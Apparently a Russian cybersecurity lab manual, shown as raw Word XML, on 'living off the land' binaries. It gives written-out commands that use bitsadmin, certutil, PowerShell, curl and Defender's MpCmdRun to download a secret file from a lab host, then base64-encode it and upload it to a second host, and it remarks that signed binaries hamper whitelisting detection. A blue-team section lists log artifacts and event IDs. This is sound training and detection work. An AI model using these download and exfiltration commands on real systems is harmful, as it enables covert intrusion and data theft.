    <w:p w14:paraId="315614FD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6.1.1.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Определите открытые порты на VM1 с помощью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Test-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NetConnection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14:paraId="4E700128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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39E92DCE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Test-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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NetConnection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ComputerName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192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168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100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10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Port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418EFC3F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6.1.2.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Проверьте доступность HTTP-сервиса через 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bitsadmin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(проверка статуса передачи):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256FD082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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D9ED9FA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bitsadmin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/transfer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testJob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/download /priority foreground http://192.168.100.10:8080/secret.txt C:\Users\Public\test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621D21FC" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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Анализ: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bitsadmin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легитимная утилита для управления BITS-задачами. Её использование для загрузки файлов — классический пример LOLBAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ADBC68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6.1.3.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Удалите тестовую задачу:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E219EED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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5ADAA5F7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bitsadmin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/cancel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testJob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="111DD398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>del C:\Users\Public\test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404B200C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17" w:name="_Toc240202508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Задание 6.2. Загрузка данных через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certutil</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D193E2F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6.2.1.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Используйте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certutil.exe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загрузки файла из контейнера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C735209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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F1F0F9E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certutil.exe -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urlcache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-split -f http://192.168.100.10:8080/secret.txt C:\Users\Public\secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A6ED0E" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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Анализ: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certutil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утилита для работы с сертификатами, но её флаги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-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urlcache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-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split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-f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позволяют загружать произвольные URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE0DE97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6.2.2.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Проверьте содержимое файла:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C84304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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DBFA32E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type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C:\Users\Public\secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE3F46C" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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FLAG{LOLBAS_MASTER_2025}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7324D5D5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6.2.3.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Очистите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кэш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certutil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14:paraId="672C3D4B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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27385C43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certutil.exe -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urlcache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* delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38382D0A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del C:\Users\Public\secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E24A309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18" w:name="_Toc240202509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6.3. Альтернативные методы (по выбору)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="3E8F7845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 PowerShell download cradle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2105CD67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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76A5B631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Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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WebRequest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Uri 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"http://192.168.100.10:8080/secret.txt"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OutFile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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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env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:TEMP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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\secret.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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</w:p>
    <w:p w14:paraId="4E4B6478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Get-Content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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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env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:TEMP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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\secret.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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</w:p>
    <w:p w14:paraId="3D5A345F" w14:textId="7BC16641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: curl.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4898061D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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B2F6C11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curl.exe -o C:\Users\Public\secret.txt http://192.168.100.10:8080/secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3551805F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type C:\Users\Public\secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B69F32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</w:t>
      </w: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 MpCmdRun.exe (Windows Defender)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0305FD1C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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17CBDAA4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"C:\Program Files\Windows Defender\MpCmdRun.exe" -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DownloadFile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-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url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http://192.168.100.10:8080/secret.txt -path C:\Users\Public\secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028F734A" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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Анализ: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каждый из методов использует подписанный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Microsoft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бинарный файл, что затрудняет обнаружение на уровне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application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whitelisting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446A0B8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19" w:name="_Toc240202510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 xml:space="preserve">Задание 6.4. Кодирование и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эксфильтрация</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34908D96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6.4.1.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Закодируйте данные в Base64 внутри контейнера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28947CB3" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="002C2928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2C2928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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6380A442" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="002C2928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gramStart"/>
      <w:r w:rsidRPr="002C29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::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C29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На</w:t>
      </w:r>
      <w:r w:rsidRPr="002C29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VM2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A71E2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docker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H tcp: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//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192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168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100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10:2375 exec secret-container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sh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c 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"base64 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/html/secret.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5FD93F" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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Примечание: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если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Docker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API недоступен удалённо, используйте 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certutil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кодирования уже загруженного файла:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E202E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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62C53377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certutil.exe -encode C:\Users\Public\secret.txt C:\Users\Public\secret.b64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42544342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type C:\Users\Public\secret.b64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A50B73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6.4.2.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Передайте Base64-строку на VM2 через HTTP POST с использованием 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bitsadmin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17B517C4" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="002C2928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2C2928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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="195D7DA4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bitsadmin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/transfer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uploadJob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/upload /priority foreground http://192.168.100.20:8000/upload C:\Users\Public\secret.b64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A9C256" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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этого на VM2 предварительно запустите простой HTTP-сервер приёма:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35913B34" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F990B31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0840FA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Простой </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000840FA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PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000840FA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HTTP-сервер для приёма данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4F0D59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$listener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=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New-Object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System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Net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HttpListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CBFF229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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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listener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Prefixes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Add</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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"http://192.168.100.20:8000/"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AB9FF24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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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listener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Start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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</w:p>
    <w:p w14:paraId="6C7DBF73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Write-Host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"Сервер запущен на порту 8000..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F268189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$context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=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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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listener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GetContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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</w:p>
    <w:p w14:paraId="734427D4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$reader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=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New-Object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System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IO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StreamReader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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context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Request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InputStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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8B8DFA9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$data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=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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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reader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ReadToEnd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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</w:p>
    <w:p w14:paraId="076922C0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Write-Host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Получены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данные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: </w:t>
      </w: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$data</w:t>
      </w:r>
      <w:r w:rsidRPr="000840F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</w:p>
    <w:p w14:paraId="6766D6BF" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="00084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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000840FA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listener</w:t>
      </w:r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Stop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000840FA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</w:p>
    <w:p w14:paraId="6F4943A9" w14:textId="3D1152C2" w:rsidR="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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CA0BAF6" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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B5A846" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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bookmarkStart w:id="20" w:name="_Toc240202511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7. Анализ с точки зрения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Blue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Team</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C056544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21" w:name="_Toc240202512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7.1. Артефакты и события</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9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6217"/>
        <w:gridCol w:w="2223"/>
      </w:tblGrid>
      <w:tr w:rsidR="000840FA" w:rsidRPr="000840FA" w14:paraId="3F6F268D" w14:textId="77777777" w:rsidTr="000840FA">
        <w:trPr>
          <w:trHeight w:val="36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AA165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E624E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Артефакт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E102B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Event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ID / Источник</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000840FA" w:rsidRPr="001A6852" w14:paraId="2CD2B6A6" w14:textId="77777777" w:rsidTr="000840FA">
        <w:trPr>
          <w:trHeight w:val="7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6BC67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certutil.exe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67257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Кэш</w:t>
            </w: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URL: </w:t>
            </w:r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%LOCALAPPDATA%\Microsoft\Windows\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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INetCache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D52E9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Sysmon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Event ID 1 (Process Creation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000840FA" w:rsidRPr="001A6852" w14:paraId="011DC3EC" w14:textId="77777777" w:rsidTr="000840FA">
        <w:trPr>
          <w:trHeight w:val="7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5B77A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bitsadmin.exe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C8D81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BITS-</w:t>
            </w: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задачи</w:t>
            </w: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: </w:t>
            </w:r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%ALLUSERSPROFILE%\Microsoft\Network\Downloader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D3A98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Sysmon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Event ID 3 (Network Connection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000840FA" w:rsidRPr="001A6852" w14:paraId="23167D21" w14:textId="77777777" w:rsidTr="000840FA">
        <w:trPr>
          <w:trHeight w:val="7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1DB05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PowerShell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C480C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Журнал</w:t>
            </w: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: </w:t>
            </w:r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Microsoft-Windows-PowerShell/Operational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4FC0E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Event ID 4104 (Script Block Logging)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000840FA" w:rsidRPr="000840FA" w14:paraId="3FCF1855" w14:textId="77777777" w:rsidTr="000840FA">
        <w:trPr>
          <w:trHeight w:val="7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B1EE0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netsh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portproxy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C4094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Реестр</w:t>
            </w:r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: </w:t>
            </w:r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HKLM\SYSTEM\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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CurrentControlSet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\Services\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000840F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PortProxy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6595E" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Sysmon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Event</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000840FA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ID 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06E53CAB" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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bookmarkStart w:id="22" w:name="_Toc240202513"/>
      <w:r w:rsidRPr="000840F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7.2. Вопросы для самопроверки</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="235510B0" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Какие из использованных бинарных файлов подписаны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Microsoft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 Проверьте цифровую подпись через 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Get-AuthenticodeSignature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16DFBFE" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Какие события генерирует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certutil.exe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при загрузке файла? Проверьте журнал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Sysmon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36900C3" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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 можно обнаружить использование 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bitsadmin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загрузки файлов?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4F093D" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Предложите стратегию защиты (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mitigation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для каждого из использованных LOLBAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29223F2E" w14:textId="65BB839D" w:rsidR="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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5B4FADF" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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DE8F45" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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bookmarkStart w:id="23" w:name="_Toc240202514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8. Контрольные вопросы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="722B0F73" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Чем отличается LOLBAS от классического вредоносного ПО с точки зрения обнаружения?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FC9042" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Почему </w:t>
      </w:r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certutil.exe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считается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LOLBin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 Какая у него задокументированная функциональность?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3719F5" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Какие сетевые драйверы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Windows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-контейнеров существуют? Чем NAT отличается от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transparent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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EB87B9" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Как вложенная виртуализация влияет на производительность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Docker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VMware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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC29521" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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Какие меры можно применить для ограничения LOLBAS-атак в корпоративной среде?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DFF36C" w14:textId="6B0918DF" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840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8A474F" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840F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bookmarkStart w:id="24" w:name="_Toc240202515"/>
      <w:r w:rsidRPr="000840F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9. Отчётность</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="66DE69B4" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="0008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 результатам работы студент предоставляет:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8A0D95" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840FA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Скриншоты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каждого этапа (настройка сети, запуск контейнера, выполнение LOLBAS-команд).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3437FC40" w14:textId="530A9E69" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840FA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Лог-файл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выводом команд (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script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в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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или перенаправление вывода).</w:t>
      </w:r>
      <w:r w:rsidR="001A685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(по возможности)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D4E51C" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840FA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Аналитическую записку</w:t>
      </w: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описанием:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C66566A" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840FA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Использованных LOLBAS и их легитимного назначения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A0E42A" w14:textId="77777777" w:rsidR="000840FA" w:rsidRPr="000840FA" w:rsidRDefault="000840FA" w:rsidP="000840FA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Предложений по детектированию и блокировке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3675105F" w14:textId="53C68001" w:rsidR="008406D9" w:rsidRPr="000840FA" w:rsidRDefault="008406D9" w:rsidP="00A61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0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98E1D5" w14:textId="77777777" w:rsidR="008F1C68" w:rsidRPr="000840FA" w:rsidRDefault="00082311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008F1C68" w:rsidRPr="00084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770C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF3A86D0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6577"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4522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677F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A2A7C1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E75493B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="474C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5690"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10E45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2077D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3F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852FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="952C5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83293"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8847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9332B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="704C81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A6942"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2B63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162F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1040C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D77083"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="479EEBD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66842"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CED8C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E7227"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21B6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831E03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="063C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E9551F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C842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E3EAA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8340C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C4092C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B1653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4328E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="06ECC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9528E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7FCC1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9D42F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D64A5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327DCE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2926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1"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="14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37"/>
    <w:rsid w:val="00082311"/>
    <w:rsid w:val="000840FA"/>
    <w:rsid w:val="00195787"/>
    <w:rsid w:val="001A6852"/>
    <w:rsid w:val="001B6F37"/>
    <w:rsid w:val="0027572A"/>
    <w:rsid w:val="002C2928"/>
    <w:rsid w:val="00313981"/>
    <w:rsid w:val="003834F0"/>
    <w:rsid w:val="00734BBA"/>
    <w:rsid w:val="00770161"/>
    <w:rsid w:val="008406D9"/>
    <w:rsid w:val="00A6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D49A5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A4139AC7-E6B3-4194-8789-AAE5D81E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06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06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840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406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0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8406D9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8406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8406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06D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8406D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40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610D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610D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610D9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A610D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0840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84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840FA"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000840F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840FA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000840FA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000840F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3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926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347517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8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7007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7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961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0067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4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398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5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0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2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636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9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8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225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3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4655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164078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8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82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4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709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324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1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1765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105497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038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7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2676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09473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6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658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0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3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5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2490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7580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33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7950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808710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4106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8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727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6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922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4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7788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36849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5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6882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60597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7484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6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3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3704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35917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0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7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0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F136F-DB84-472E-9EEF-25FFE53C7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1950</Words>
  <Characters>11119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Solar Security LLC</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>13043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Шабалин Иван Николаевич</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Шабалин Иван Николаевич</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-10T07:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-14T11:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>